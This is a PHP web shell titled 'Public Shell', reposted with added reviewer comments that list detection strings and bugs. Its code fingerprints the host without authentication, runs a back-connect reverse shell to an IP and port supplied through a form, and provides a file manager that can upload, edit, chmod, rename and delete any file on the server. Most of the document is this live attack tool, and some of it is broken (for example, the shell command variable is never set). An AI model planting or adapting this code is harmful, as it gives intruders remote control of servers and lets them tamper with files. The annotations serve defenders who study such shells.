Kyfx

Public Modified Web Shell

Mar 19th, 2015
<center>
<H1><center>Public Shell</center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>
<center>
<?php
// --- Host fingerprint panel -------------------------------------------------
// Runs unauthenticated on every request and prints server details straight
// to the caller. Nothing is escaped; the whole block is information
// disclosure for whoever reaches this file. Useful detection strings:
// "Public Shell", "Disable Functions:", "Back Connect".
//
// $bytes, $base, $class and $si_prefix are never assigned anywhere in this
// listing, so this line only produces undefined-variable notices
// (error_reporting(0) is not set until the second PHP section) and
// $freespace_show is never read afterwards.
$freespace_show = sprintf('%1.2f', $bytes / pow($base, $class)) . ' ' . $si_prefix[$class] . '';
// Probes whether the web-server user can read /etc/passwd; @ hides the
// warning when it cannot.
$etc_passwd = @is_readable("/etc/passwd") ? "<b><span style=\"color:#444444\">ON </span></b>" : "<b><span style=\"color:red\"/>Disabled </span></b>";
echo '<b><font color=red>Disable Functions: </b></font>';
// Reports the disable_functions INI list so the operator can see which
// execution primitives (exec, system, proc_open, ...) are blocked.
if ('' == ($func = @ini_get('disable_functions'))) {
echo "<b><font color=green>NONE</font></b>";
} else {
echo "<b><font color=red>$func</font></b>";
echo '</td></tr>'; // the table cell is only closed on this branch
}
echo '</br>';
echo '<b><font color=red>Uname : </b></font><b>'.php_uname().'</b>';
echo '</br>';
echo '<b><font color=red>PHP Version : </b></font><b>'. phpversion() .'</b>';
echo '</br>';
echo '<b><font color=red>Server Admin : </b></font><b>'.$_SERVER['SERVER_ADMIN'].'</b>';
echo '</br>';
echo '<b><font color=red>Server IP : </b></font><b>'.$_SERVER['SERVER_ADDR'].' </b>';
echo '<b><font color=red>Your IP : </b></font><b>'.$_SERVER['REMOTE_ADDR'].'</b>';
echo "</br>";
echo "<b><font color=red>Safe Mode : </font></b>";
// Check for safe mode (the safe_mode INI directive was removed in PHP 5.4,
// so on any current interpreter this reports OFF)
if( ini_get('safe_mode') ) {
print '<font color=#FF0000><b>Safe Mode is ON</b></font>';
} else {
print '<font color=#008000><b>Safe Mode is OFF</b></font>';
}
echo "</br>";
echo "<b><font color=red>Read etc/passwd : </font></b><b>$etc_passwd</b>";
// $php_self is never assigned in this listing, so the link is simply "?p=info".
echo "<b><font color=red>Functions : </font><b>";echo "<a href='$php_self?p=info'>PHP INFO </a>";
// ?p=info dumps the full phpinfo() page and stops; @ suppresses the warning
// if phpinfo itself is disabled.
if(@$_GET['p']=="info"){@phpinfo();
exit;}
?>
<br>
</center>
<center>
<b><font color=red>Back Connect </font></b>
<form action="?connect=Pub" method="post">
IP : <input type="text" name="ip" value= "Your IP"/>
PORt :<input type="text" name="port" value= "22"/>
<input alt="Submit" type="image">
</form>
<?php
// Like print, but intended to stay silent once the process has daemonised.
// NOTE(review): $daemon is read here with no `global` declaration, so inside
// this function it is always an undefined local, the guard is always true, and
// the $daemon = 1 assigned later in the back-connect branch has no effect on
// this output. The literal below ends in a backslash followed by a raw line
// break (most likely a mangled "\n" in the paste) and is printed exactly as is.
function printit ($string)
{
if (!$daemon)
{
print "$string\
";
}
}
// --- Back-connect (reverse shell) branch ------------------------------------
// Triggered by the form above: GET ?connect=Pub with POSTed ip/port. The
// structure and several verbatim comments ("Occsionally reads will block",
// "I can't figure out how to redirect STDOUT") match the widely circulated
// pentestmonkey php-reverse-shell, so this appears to be a trimmed copy of it.
// Behaviour visible here, for detection purposes: fsockopen() from the web
// server to an operator-chosen host/port, then proc_open() with all three
// pipes bridged to that socket; chdir("/tmp/") and umask(0) beforehand;
// pcntl_fork()/posix_setsid() when available so the child outlives the
// HTTP request.
$bc = $_GET["connect"];
switch($bc)
{
case "Pub":
set_time_limit (0);
$VERSION = "1.0"; // never read
// Target host and port come straight from the POST body, unvalidated.
$ip = $_POST["ip"];
$port = $_POST["port"];
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$daemon = 0;
$debug = 0;
// Detach from the web-server worker when the pcntl extension is present:
// the parent (request handler) exits and the child becomes a session leader.
if (function_exists('pcntl_fork'))
{

$pid = pcntl_fork();

if ($pid == -1)
{
printit("ERROR: Can't fork");
exit(1);
}

if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}

$daemon = 1;
}
else {
// Without pcntl the relay runs inside the request itself; the label is
// misleading since no connection has been attempted yet.
print("DISCONNECTED");
}

// Change to a safe directory
chdir("/tmp/");

// Remove any umask we inherited (anything the spawned shell creates will be
// world-writable)
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection (30-second connect timeout; failure is printed, not retried)
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}

// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

// NOTE(review): $shell is referenced here but never assigned anywhere in this
// listing; as pasted, proc_open() receives an empty command.
$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("");

// Relay loop: socket -> child stdin, child stdout/stderr -> socket, in
// $chunk_size pieces, until either side reaches EOF.
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit(" :- TCP connection ended");
break;
}

// Check for end of STDOUT
if (feof($pipes[1])) {
printit("END of STDOUT");
break;
}

// Wait until a command is sent down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}

// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}

// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// (The two comment lines that originally sat here described printit(); they
// belong with that function, defined above, and have been moved there.)
break;
}


?>
  194. </center>
  195. </td></tr>';
<?php
// --- File manager section ---------------------------------------------------
// Second, independent PHP section. It emits a *second* complete HTML document
// (DOCTYPE/HEAD/BODY) even though the fingerprint panel above has already
// written markup. Provides directory listing, file view, upload, chmod,
// rename, edit and delete, all driven by raw $_GET/$_POST values with no
// authentication, no canonicalisation and no base-directory restriction.
// Detection strings: "Public Shell Version 2.0", the ?filesrc= / ?option&path=
// query shapes, and the hidden "opt"/"type"/"path" form fields.

set_time_limit(0);
// Silences every warning/notice for the rest of the request; failed
// chmod/unlink/rename calls surface only as the red "Error" messages below.
error_reporting(0);

// Strip magic-quotes escaping so POSTed paths and file bodies arrive verbatim.
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>Public Shell Version 2.0</title>
<style>
body{
font-family: "Arial", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: gray;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Arial", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<BODY>

<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>
<center>
<font color=red><b>Current Path : </font></b>';
// Working directory: the raw ?path= value if present, else the script's cwd.
// Only backslashes are normalised; ".." and absolute paths pass through.
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

// Breadcrumb: one link per path component, built cumulatively. Each $pat is
// echoed unescaped, so a crafted ?path= value reflects straight into the page.
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true; // assigned but never read
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
// Upload: the file is copied into $path under its client-supplied original
// name, with no extension, size or content checks.
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<font color="green">File Upload Done.</font><br />';
}else{
echo '<font color="red">File Upload Error.</font><br />';
}
}
echo '<center>';
echo '<form enctype="multipart/form-data" method="POST">
<b><font color=red>File Upload : </b></font><input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>';
// View: reads whatever ?filesrc= names with file_get_contents(). The contents
// are HTML-escaped for display; the filename is echoed raw.
if(isset($_GET['filesrc'])){
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
// Per-item actions other than delete. $_POST['path'] is the target (set by
// the hidden field in the listing form, but accepted from any client) and is
// echoed unescaped into the page and back into the hidden field.
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
// NOTE(review): $_POST['perm'] is the text-field string (e.g. "0644").
// chmod() takes an int and PHP converts the string decimally, so "0644"
// becomes 644 decimal (01204 octal) -- the mode shown in the form and the
// mode actually applied disagree.
if(chmod($_POST['path'],$_POST['perm'])){
echo '<font color="green">Change Permission Done.</font><br />';
}else{
echo '<font color="red">Change Permission Error.</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'rename'){
// The new name is joined to the *current listing directory* $path, not to
// the directory of the target in $_POST['path'], so a rename can also move.
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<font color="green">Change Name Done.</font><br />';
}else{
echo '<font color="red">Change Name Error.</font><br />';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
}elseif($_POST['opt'] == 'edit'){
// Edit: fopen(...,'w') truncates the target, then the POSTed body is written.
// The fopen() result is not checked; under error_reporting(0) a failed open
// just yields the red "Error" line.
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<font color="green">Edit File Done.</font><br />';
}else{
echo '<font color="red">Edit File Error.</font><br />';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
}
echo '</center>';
}else{
echo '</table><br /><center>';
// Delete (directories via rmdir, files via unlink) on the raw $_POST['path'],
// then fall through to the listing.
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<font color="green">Delete Dir Done.</font><br />';
}else{
echo '<font color="red">Delete Dir Error.</font><br />';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<font color="green">Delete File Done.</font><br />';
}else{
echo '<font color="red">Delete File Error.</font><br />';
}
}
}
echo '</center>';
// Directory listing for $path: directories first, then regular files.
$scandir = scandir($path);
echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>';

// Directories. $path and $dir are interpolated into href/value attributes
// without escaping. Colour code: green = writable, red = unreadable.
// perms() is defined at the bottom of the file; PHP hoists unconditional
// top-level function declarations, so these earlier calls resolve.
foreach($scandir as $dir){
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<font color="green">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
echo perms("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
// Regular files: same row layout plus a size column (KB, or MB at >= 1024 KB)
// and an extra Edit option. Same unescaped interpolation as above.
foreach($scandir as $file){
if(!is_file("$path/$file")) continue;
$size = filesize("$path/$file")/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}

echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<font color="green">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
echo perms("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
}
echo '</table>
</div>';
}
echo '<br />Public Shell Version <font color="red">2.0</font>
</BODY>
</HTML>';
  440. function perms($file){
  441. $perms = fileperms($file);
  442.  
  443. if (($perms & 0xC000) == 0xC000) {
  444. // Socket
  445. $info = 's';
  446. } elseif (($perms & 0xA000) == 0xA000) {
  447. // Symbolic Link
  448. $info = 'l';
  449. } elseif (($perms & 0x8000) == 0x8000) {
  450. // Regular
  451. $info = '-';
  452. } elseif (($perms & 0x6000) == 0x6000) {
  453. // Block special
  454. $info = 'b';
  455. } elseif (($perms & 0x4000) == 0x4000) {
  456. // Directory
  457. $info = 'd';
  458. } elseif (($perms & 0x2000) == 0x2000) {
  459. // Character special
  460. $info = 'c';
  461. } elseif (($perms & 0x1000) == 0x1000) {
  462. // FIFO pipe
  463. $info = 'p';
  464. } else {
  465. // Unknown
  466. $info = 'u';
  467. }
  468.  
  469. // Owner
  470. $info .= (($perms & 0x0100) ? 'r' : '-');
  471. $info .= (($perms & 0x0080) ? 'w' : '-');
  472. $info .= (($perms & 0x0040) ?
  473. (($perms & 0x0800) ? 's' : 'x' ) :
  474. (($perms & 0x0800) ? 'S' : '-'));
  475.  
  476. // Group
  477. $info .= (($perms & 0x0020) ? 'r' : '-');
  478. $info .= (($perms & 0x0010) ? 'w' : '-');
  479. $info .= (($perms & 0x0008) ?
  480. (($perms & 0x0400) ? 's' : 'x' ) :
  481. (($perms & 0x0400) ? 'S' : '-'));
  482.  
  483. // World
  484. $info .= (($perms & 0x0004) ? 'r' : '-');
  485. $info .= (($perms & 0x0002) ? 'w' : '-');
  486. $info .= (($perms & 0x0001) ?
  487. (($perms & 0x0200) ? 't' : 'x' ) :
  488. (($perms & 0x0200) ? 'T' : '-'));
  489.  
  490. return $info;
  491. }
  492. ?>